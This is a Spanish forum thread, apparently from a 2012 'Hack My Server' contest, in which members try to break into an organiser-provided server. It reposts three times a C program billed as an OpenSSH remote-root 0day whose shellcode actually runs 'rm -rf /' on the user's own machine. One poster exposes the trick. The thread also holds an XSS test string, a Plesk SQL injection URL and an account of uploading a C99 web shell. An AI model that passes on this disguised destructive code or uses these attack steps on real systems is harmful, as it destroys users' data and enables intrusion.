[+] Got possible write on the stack pointer(3014): 0xbfbfd924
[+] Verifying...failed
[+] Got possible saved ebp(3003): 0xbfbfd8f4
[+] Got possible write on the stack pointer(3015): 0xbfbfd928
[+] Verifying...failed
......
.....
Se ha partido la posición 0xbfbfaa10 pero claro, esa posición es para FreeBSD, en este caso concreto se desconoce cual será la posición en la que se encuentra la stack para el proceso del servicio, (por el tema de ASLR, ver: http://en.wikipedia.org/wiki/Address_space_layout_randomization)
Supongo que si se logra evadir o determinar de alguna forma la posición de la stack para el servicio, será suficiente para que el exploit funcione... a ver si hay alguien que se le ocurra como hacerlo, ya que si se consigue, se logrará acceder al servidor.
He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.
/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void usage(char *argv[])
{
printf("\n\t[+] HATSUNEMIKU\n");
printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
printf("\t[+] By: n3xus\n");
printf("\t[+] Greetz to hackforums.net\n");
printf("\t[+] Keep this 0day priv8!\n");
printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
exit(1);
}
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
int main(int argc, char **argv)
{
int euid = geteuid();
int port= 22, sock;
char h[1000];
struct hostent *host;
struct sockaddr_in addr;
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");
}
if(argc != 3)
usage(argv);
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
send(sock, payload, strlen(payload),0);
close(sock);
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]g0t sh3ll!\n");
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.
Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.
Hola h1t.
:D :D :D
Ya he probado tu exploit, resultado:
Citar>gcc -o salidaSSH exploitSSH.c
>./salidaSSH
MIKU! MIKU! MIKU!
- HATSUNEMIKU
- OpenSSH <= 5.3p1 remote root 0day exploit
- By: n3xus
- Greetz to hackforums.net
- Keep this 0day priv8!
- usage: ./salidaSSH <target> <port>
> ./salidaSSH x.x.x.x 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
Violación de segmento
El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota?
Cita de: h1t en 7 Mayo 2012, 23:58 PM
He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.
/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void usage(char *argv[])
{
printf("\n\t[+] HATSUNEMIKU\n");
printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
printf("\t[+] By: n3xus\n");
printf("\t[+] Greetz to hackforums.net\n");
printf("\t[+] Keep this 0day priv8!\n");
printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
exit(1);
}
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
int main(int argc, char **argv)
{
int euid = geteuid();
int port= 22, sock;
char h[1000];
struct hostent *host;
struct sockaddr_in addr;
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");
}
if(argc != 3)
usage(argv);
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
send(sock, payload, strlen(payload),0);
close(sock);
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]g0t sh3ll!\n");
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.
Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.
MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....
http://www.tamonten.com/how-not-to-exploit-a-box
Ahi teneis una web donde hablan del exploit y de su análisis
Sacado de esa web de la explicación de ese exploit:
Citar
converting the shellcode to ascii:
docoder
j?X?Rj/??Rfh-f???Rfh-r??Rh//rmh/bin??RWVQS????
rootshell
1????ou!?Q?ck yQf?fufQ1???1???1?????1?1?@??
The only real strings I can pull out of that are in the decoder section. Namely "/","-f","-r","/rm","/bin"
Or to put it another way "/bin","/rm","-r","-f","/"
Those are not strings I want to see in code I'm running on my box
Luckily the pentester in question was saved by the fact that "rm -rf /" doesn't work on modern distros, but he was only a "--no-preserve-root" away from a dead box.
EDITO: Dimitrix, el usuario en el plesk te lo tenemos que pedir por privado, o nos lo iras mandando tú cuando este creado ?
Encontre una vulnerabilidad para el curier-imapd y el curier-pop3d pero es para Gentoo Linux :-(
Y vi una vulnerabilidad para poppassd pero con el poco ingles que tengo creo que no se puede aplicar a este servidor por si acaso alguien encuentra algo que yo no haya visto en la info aqui la dejo
http://www.cvedetails.com/cve/CVE-2007-2173/
http://www.derkeiler.com/Mailing-Lists/Securiteam/2003-04/0077.html
Creo que alguien mas atras ya lo dijo pero tambien encontre una vulnerabilidad creo estar 100% de que es aplicable a este servidor y es un man in the middle pero no se hacerlo ademas dentro de este pdf estan explicadas las distintas formas de distintos metodos para realizar el atacke asiq alguien mas experimentado en ese ambito que se anime ahi esta la fuente http://www.g-sec.lu/practicaltls.pdf
Cita de: maxim_o en 8 Mayo 2012, 00:36 AM
MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....
http://www.tamonten.com/how-not-to-exploit-a-box
Ahi teneis una web donde hablan del exploit y de su análisis
Sacado de esa web de la explicación de ese exploit:
EDITO: Dimitrix, el usuario en el plesk te lo tenemos que pedir por privado, o nos lo iras mandando tú cuando este creado ?
Perdona pero de webs?
Lo he sacado de aquí: http://www.securityfocus.com/bid/10976/exploit
Yo no he compilado nada porque ya sabia que el exploit no funcionaria pero si creo que se podria modificar para que funcionara con otros sistemas operativos.
Si buscas en este mismo foro hay dos temas que hablan de este exploit...
Yo de ti buscaria sobre el exploit antes de cuestionar su procedencia.
Cita de: m0rf en 8 Mayo 2012, 02:58 AM
Perdona pero de webs?
Lo he sacado de aquí: http://www.securityfocus.com/bid/10976/exploit
Yo no he compilado nada porque ya sabia que el exploit no funcionaria pero si creo que se podria modificar para que funcionara con otros sistemas operativos.
Si buscas en este mismo foro hay dos temas que hablan de este exploit...
Yo de ti buscaria sobre el exploit antes de cuestionar su procedencia.
m0rf tio.... no iba por ti XDD
te has molestado en leer el exploit que cite? y en ver la página que puse? XD
No es el mismo que el que has puesto tu de security focus es el del sshd... Fíjate....
Saludos
Linux (IP) 2.6.18-028stab091.2 #1 SMP Fri Jun 3 00:02:40 MSD 2011 i686
PHP Version 5.3.2-1ubuntu4.14
Cita de: adastra en 8 Mayo 2012, 00:12 AM
Hola h1t.
:D :D :D
Ya he probado tu exploit, resultado:
El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota?
Bueno tengo que pedir disculpas por ese código tenia tanta prisa que ni siquiera me paré a observarlo un poco. lo saqué de esta web http://forum.guiadohacker.com.br/showthread.php?t=11113 (http://forum.guiadohacker.com.br/showthread.php?t=11113)
EDITO: voy a echarle un ratito ahora a ver si logro sacar algo, posteo si tengo avances.
: )
¿Alguien me puede reenviar la contraseña de Plesk que se me olvidó guardarla? xDDDD
Es por no volver a formatear xd
h1t gracias por el foro brasileño, es pura dinamita, existen exploit hasta de Firefox para lammers xD
Cita de: maxim_o en 8 Mayo 2012, 00:36 AM
MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....
Tienes razón, es importante saber para que sirven y que vulnerabilidad explotan, (por ese motivo he pedido referencias sobre el mismo) sin embargo compilar y ejecutar un exploit para comprobar su funcionamiento no deberia dar "ningun susto" a menos que se sea lo suficientemente torpe como para ejecutarlo directamente desde la máquina y no en un entorno de pruebas como por ejemplo, una maquina virtual, creo que eso es básico cuando se realiza cualquier procedimiento de pentesting.
Cita de: maxim_o en 8 Mayo 2012, 10:35 AM
m0rf tio.... no iba por ti XDD
te has molestado en leer el exploit que cite? y en ver la página que puse? XD
No es el mismo que el que has puesto tu de security focus es el del sshd... Fíjate....
Saludos
Es que con tantos mensajes y cuadros al final me lio.
Nada entonces.
Bueno, hoy hice un Reverse Ip y me tiro dos dominios:
Citar
p*************s.com
v***.***.es
En uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás
Voy de salida así que no pude buscar más, pero por el momento encontre esto:
http://www.exploit-db.com/exploits/8720/
https://www.ccn-cert.cni.es/index.php?option=com_vulnerabilidades&task=view&id=5436&Itemid=96&lang=es
PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?
Saludos!
CitarEn uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás
Sí, el phpinfo() lo subí ayer para quien lo encontrara ;-)
El dominio p*************s.com está controlado pero en v***.***.es ni p**a idea de cual es, supongo que será de alguien del foro, ahora miraré.
11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?
Cita de: 11Sep en 8 Mayo 2012, 17:11 PM
PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?
Saludos!
Segun tengo entendido la cuenta plesk la creo para k podamos avanzar un poco mas pero el objetivo es el mismo.
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales
http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.html
tambien vi un explot para debian, OpenSSH 5.3p1 Debian
intente con este
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void usage(char *argv[])
{
printf("\n\t[+] HATSUNEMIKU\n");
printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
printf("\t[+] By: n3xus\n");
printf("\t[+] Greetz to hackforums.net\n");
printf("\t[+] Keep this 0day priv8!\n");
printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
exit(1);
}
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
int main(int argc, char **argv)
{
int euid = geteuid();
int port= 22, sock;
char h[1000];
struct hostent *host;
struct sockaddr_in addr;
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");
}
if(argc != 3)
usage(argv);
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
send(sock, payload, strlen(payload),0);
close(sock);
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]g0t sh3ll!\n");
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
}
pero tampoco, espero pronto haya mas suerte
No es ningun agujero, pero ¿he podido enviar un email haciendo telnet al puerto 25?
********************************************
HELO -----------------.net
250 -----------------.net
MAIL FROM: <lola@elhacker.net>
250 2.1.0 Ok
RCPT TO: <lola@elhacker.net>
554 5.7.1 <lola@elhacker.net>: Relay access denied
RCPT TO: <lola@-----------------.net>
550 5.1.1 <lola@-----------------.net>: Recipient address rejected: User unknown in virtual alias table
RCPT TO: <root@-----------------.net>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Prueba de envio
.
250 2.0.0 Ok: queued as 71F025B4094
********************************************
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.
como? Que ha pasado?
Cita de: dimitrix en 8 Mayo 2012, 20:59 PM
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.
Me podeis decir k tiene de malo la reverse IP??
Cita de: Stakewinner00 en 8 Mayo 2012, 21:21 PM
Me podeis decir k tiene de malo la reverse IP??
Nada, el problema es que publique aquí la IP.
Sorry, no me habia dado cuenta.
Cita de: opportunity en 8 Mayo 2012, 21:31 PM
Sorry, no me habia dado cuenta.
Nada, nada, te envío los datos de PLESK.
haciendo un escaneo me encontre con esto pero creo tampoco funciona :-\
o a lo mejor es local
http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
P.D. dimitrix me mandas los datos de plesk porfavor
Cita de: dimitrix en 8 Mayo 2012, 17:22 PM
11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?
El servicio que usé fue: http://www.domaintools.com/research/reverse-ip/
Tenía entendido que se podía subir shell por el phpinfo() modifiqué las cabeceras con HTTP Live Headers pero no resultó (ni un XSS).
Saludos!
Bueno, heche un vistazo en el Plesk y subi una phpshell
http://p*************s.c*m/css/C99.php (safemode off ;D), di permisos 777 a la carpeta para poder "trabajar" tranquilo, compile y probe este (https://foro.undersecurity.net/read.php?15,1679,7459#msg-7459) exploit (el segundo) pero no me sirvio. No cuento con más tiempo así que creo que por hoy termine.
Saludos!
En este concurso voy muuuy retrasado :huh:
Dimitrix podrias enviarme por mp la cuenta del plesk porfavor
Recordar que el objetivo ahora con un simple LINK conseguir un XSS o un SQLi del PLESK.
A todo esto, me han pedido que haga una pequeña conferencia (o taller) sobre seguridad informática tirando a aplicaciones web que es mi fuerte, la realizaré después de verano en la universidad de Valencia.
It's Free. Quien quiera ir que me lo diga por privado y le aviso.
Grábalo y lo subes a YouTube :P
(No podre ir a Valencia)
Saludos y nos nos desviemos del tema xD
bufff.... que duro se me hace ver a gente escribiendo todo el rato en el foro y a mi que no se me ocurre nada ni veo nada.... que triste :S pero bueno, seguire mirando jejeje...
Dimitrix si puedes pasarme la cuenta de plesk ^^ y de la conferencia, ya que estamos avisame tambien ;) aunque creo que seria mejor que abrieras un post o algo, porque como tengas que avisar todos xDD, pero eso ya es decision tuya.
Un saludo
Echad un vistazo aqui; habla de xss e injecciones sql contra plesk, con ejemplos:
http://www.exploit-db.com/exploits/15313/
http://www.cloudscan.me/2010/09/xss-sql-injection-in-plesk-small.html
Para los que andan perdidos, les aconsejo que instalen el add-on "live http headers" de firefox, les ayudara a ver la informacion (parametros/datos) intercambiada en comunicaciones http. Tmb pueden usar un proxy local como webscarab ó paros (más sencillo)
No me funciona ninguna.
Parece que los enlaces que he pasado son injecciones para plesk sobre windows.
Yahooooooooooo!!!
Ahí va una sqli; para que funcione debeis estar logeados en plesk:
http://********************.net:8880/admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse%27
Error
Internal error: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6
Message SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6
File Pdo.php
Line 238
Type Zend_Db_Statement_Exception
Aqui hay la leche de vulnerabilidades sqli, xss, ... (buscad por plesk y SO):
http://www.cloudscan.me/
He usado una sqli de aqui (hay más para probar):
http://www.cloudscan.me/2011/09/plesk-parallels-panel-version-psa.html
No había leído los últimos mensajes, se creado una cuenta para acceder al panel de control de plesk???
@dimitrix Podrías enviarme la cuenta de ese usuario por privado por favor?
Gracias.
Lo que interesa es un XSS para hacer envenenamiento de Cookie ¿Alguien tiene alguno que le funcione?
en el pagina 13 puse una XSS que encontre en un escaneo, pero no se si no supe utilizarla o no funciona, la hice con wapiti un scanner GPL, este fue el resultado
http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Referencias:
http://www.cert.org/advisories/CA-2000-02.html
luego hice un scaneo con nikto y me dio el mismo resultado
+ /?mod=<script>alert(document.cookie)</script>&op=browse - 200/OK Response could be Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
por cierto dimitrix, me podrias mandar los datos de plesk porfavor
?mod=<script>alert(document.cookie)</script>&op=browse
No es vulnerable, lo acabo de probar, ahora mismo te mando la pass.
En esta pagina se encuentra todo lo que se puede hacer para el plesk 10.2 teniendo una cuenta que no solo muestra SQLi ni XSS tambien muestra XML injection,SSL cookie without secure flag set, etc... pero son para RedHat todos los procedimiento pero yo creo que debe ser muy parecido, pero no puedo hacer nada porque todavia dimitrix no me entrega la cuenta del plesk pero por si alguien quiere intentar aqui esta http://xss.cx/examples/plesk-reports/plesk-redhat-el6-psa-10.2.0-build-1011110331.18-xss-sqli-cwe79-cwe89-javascript-injection-exception-example-poc-report-paros-burp-suite-pro-1.4.1.html ;D
Hola, dimitrix, me podrias mandar la ip, me gustaria participar.. no tengo muchos conocimientos .. pero lo veo como buena oportunidad para aprender...
Saludos
hola dimitrix
todavia no me llega el pass, espero esten funcionando bien los mensajes privados... bueno, seguire esperando
salu2
MMMM pues no será se si será vuestro caso o no....
Pero en un post, dijo que ya no se daría a nadie más la ip, y la cuenta del plesk solo se la daría a la gente que le habia dado ip o algo asi....
Aunque no estoy muy seguro ya que se han llenado muchos post inservibles cuando dijo que las ip, cuentas del plesk o lo que fuera se pidieran POR PRIVADO.
Si no contesta pueden pasar dos cosas....
1.- QUe no se haya conectado... La gente aunque parezca mentira tiene vida aparte del foro...
2.- QUe de momento no de mas ips
3.- Ni idea... pero algun motivo tendrá
Saludos!!
¿Alguien sabe si PHP esta configurado como CGI o como modulo del servidor web?
Hace unas semanas apareció una vulnerabilidad bastante gorda que afecta a los servers con php configurado como cgi.
http://www.pentester.es/2012/05/explotando-php-cgi.html
¿Se podría configurar como cgi para probarlo?
Si no me equivoco no está como cgi, por lo menos lo que yo intenté no dio ningún resultado >:(
Yo creo que el servidor al no tener ninguna aplicacion y toda esta bien configurado y sobre todo porque no tiene nada es muy seguro, el hecho de que no tenga nada hace que sea mas dificil encontrarle una vulnerabilidad a pesar de que no tenga firewall activado asique ojala le coloquen mas aplicaciones para poder testear mas facilmente xD
Cita de: 11Sep en 8 Mayo 2012, 22:09 PM
El servicio que usé fue: http://www.domaintools.com/research/reverse-ip/
Tenía entendido que se podía subir shell por el phpinfo() modifiqué las cabeceras con HTTP Live Headers pero no resultó (ni un XSS).
Saludos!
Bueno, heche un vistazo en el Plesk y subi una phpshell
http://p*************s.c*m/css/C99.php (safemode off ;D), di permisos 777 a la carpeta para poder "trabajar" tranquilo, compile y probe este (https://foro.undersecurity.net/read.php?15,1679,7459#msg-7459) exploit (el segundo) pero no me sirvio. No cuento con más tiempo así que creo que por hoy termine.
Saludos!
Hola:
Uno que he visto muy bueno es este de abajo. Lo bueno que tiene es que puedes descargar o actualiza la base de datos.
http://ipinfodb.com/
(http://www.innovatel.eu/images/INNOVATEL.jpg)
Un cordial saludo.
***** llegue tarde , por que nadie me avisa ?
Cita de: D_pit_88 en 13 Mayo 2012, 13:41 PM
***** llegue tarde , por que nadie me avisa ?
No pagaste la cuota.
No tengo 'nada' de tiempo. Alguien que sepa de Linux y pueda instalar sin problemas la versión anterior de proFTP para probar la vulnerabilidad?
Logicamente le doy la cuenta SSH.
yo puedo dejarte mi ordenador como servidor para probar la vulnerabilidad del proFTP en un ubuntu
Cita de: D_pit_88 en 14 Mayo 2012, 18:03 PM
yo puedo dejarte mi ordenador como servidor para probar la vulnerabilidad del proFTP en un ubuntu
Tenemos un servidor, gracias.
ok si en un futuro necesitáis otro servidor cuenta con migo ;)
Cita de: D_pit_88 en 14 Mayo 2012, 18:24 PM
ok si en un futuro necesitáis otro servidor cuenta con migo ;)
De todos modos D_pit_88 el mes que viene hacemos otro Hack My Server que seguramente será "Hack My Server: Wordpress".
espero estar por aquí por entonces
jeje ya se esta planeando otro sobre wordpress... que bien, solo que antes de ese, me podrian mandar la constraseña de plesk jeje es que no me llega o no se si ya no esta disponible o que paso?
salu2
Mira en tu bandeja de mensajes (del foro).
ESTE CONCURSO HA TERMINADO
Al parecer el objetivo inicial ha estado demasiado alto. Así que después de meditar y comentarlo con algunos usuarios del foro. Hemos decidido ir haciendo progresivamente más difícil los objetivos (no al contrario).
El premio (la cerveza alemana) lo ha ganado
Belial & Grimoire. Aquí (http://foro.elhacker.net/hacking_avanzado/concurso_nordm1_hack_my_server-t360003.0.html) tenéis la lista con los puntos.
El 2º Concurso será de atacar un WordPress.
Han conseguidos cosas. Felicidades.
Eso si, menudo server tiene en seguridad. A aprender se ha dicho.
Saludo.
Felicidades! A disfrutar de tu premio! xD
Cita de: dimitrix en 15 Mayo 2012, 20:03 PM
ESTE CONCURSO HA TERMINADO
Al parecer el objetivo inicial ha estado demasiado alto. Así que después de meditar y comentarlo con algunos usuarios del foro. Hemos decidido ir haciendo progresivamente más difícil los objetivos (no al contrario).
El premio (la cerveza alemana) lo ha ganado Belial & Grimoire. Aquí (http://foro.elhacker.net/hacking_avanzado/concurso_nordm1_hack_my_server-t360003.0.html) tenéis la lista con los puntos.
El 2º Concurso será de atacar un WordPress.
Me parece estupendo que lo hagáis más difícil la proxima vez y no al contrario. Buen criterio.
Felicidades al ganador!
whathefuck!!! -1000 puntos? y yo pensando que me podia llevar las chelas.
¿que puedo decir? uhmmmm! los errores se pagan
En cualquier caso, enhorabuena a Belial y tmb a Grimoire. (No sabia que se podian hacer equipos).
opportunity
- Lo de -1000 puntos Is a Joke (es una broma).
- Además que es se envía solo a users de España por eso de pagar transporte Internacional.
- Además no se ha realizado ningún equipo, ese es el nombre de un solo usuario.
;-) jeje, que bien logre ganar algo por primea vez en este foro
gracias
jeje soy solo uno... belial es mi nick, pero de broma me dicen, que parece que soy bipolar :silbar: y lo llame grimoire
esa es la unica razon por la que soy belial & grimoire, pero solo soy uno jeje
pero vamos a lo importante... y mi cerveza? ;D jaja
Por privado.
FELICIDADES :-)
y finalmente colocaran la version eplotable del Proftp? para practicar aunque sea ajajaja
interesante bueno les cuento que me servira para practicar los conocimientos adquiridos en el ethical hacking... che me podes decir si los que recien nos suscribimos podemos participar tambien? si es asi donde me anoto? saludos
chocapic56, el concurso se termino :(
el motivo fue que el nivel era demasiado dificil,vamos que eramos incapaces xDD o eso parece.
Tengo entendido que posiblemente haga un concurso nuevo, de atacar un wordpress, pero eso ya depende de dimitrix, que es quien lo organizo.
Este termino :(
Saludos...
no van a publicar la forma de hackear el servidor y si no es asi un favor me podrian decir donde puedo sacar informacion para aprender a hacerlo, se los agradecere mucho y solo les comento que es para cuestion cultural ya que no veria la forma de utilizarlo para algo mal
vidalpc2010 no van a publicar la forma de hackear el servidor, ya que nadie lo logro.
Asi que supongo que lo unico que te puedo indicar es que te dediques a leer todo lo que puedas o recopilar toda la informacion que puedas.
Suerte.
saludos...
Un buen lugar para empezar es aqui: http://www.elhacker.net/Textos1.html (http://www.elhacker.net/Textos1.html). A lo minimo te servira para saber como funciona en teoria, y los posts con chincheta igualmente, busque el libro "El Hacking Etico" en Pdf, esta en algun lugar del foro. Saludos desde Bolivia. ;)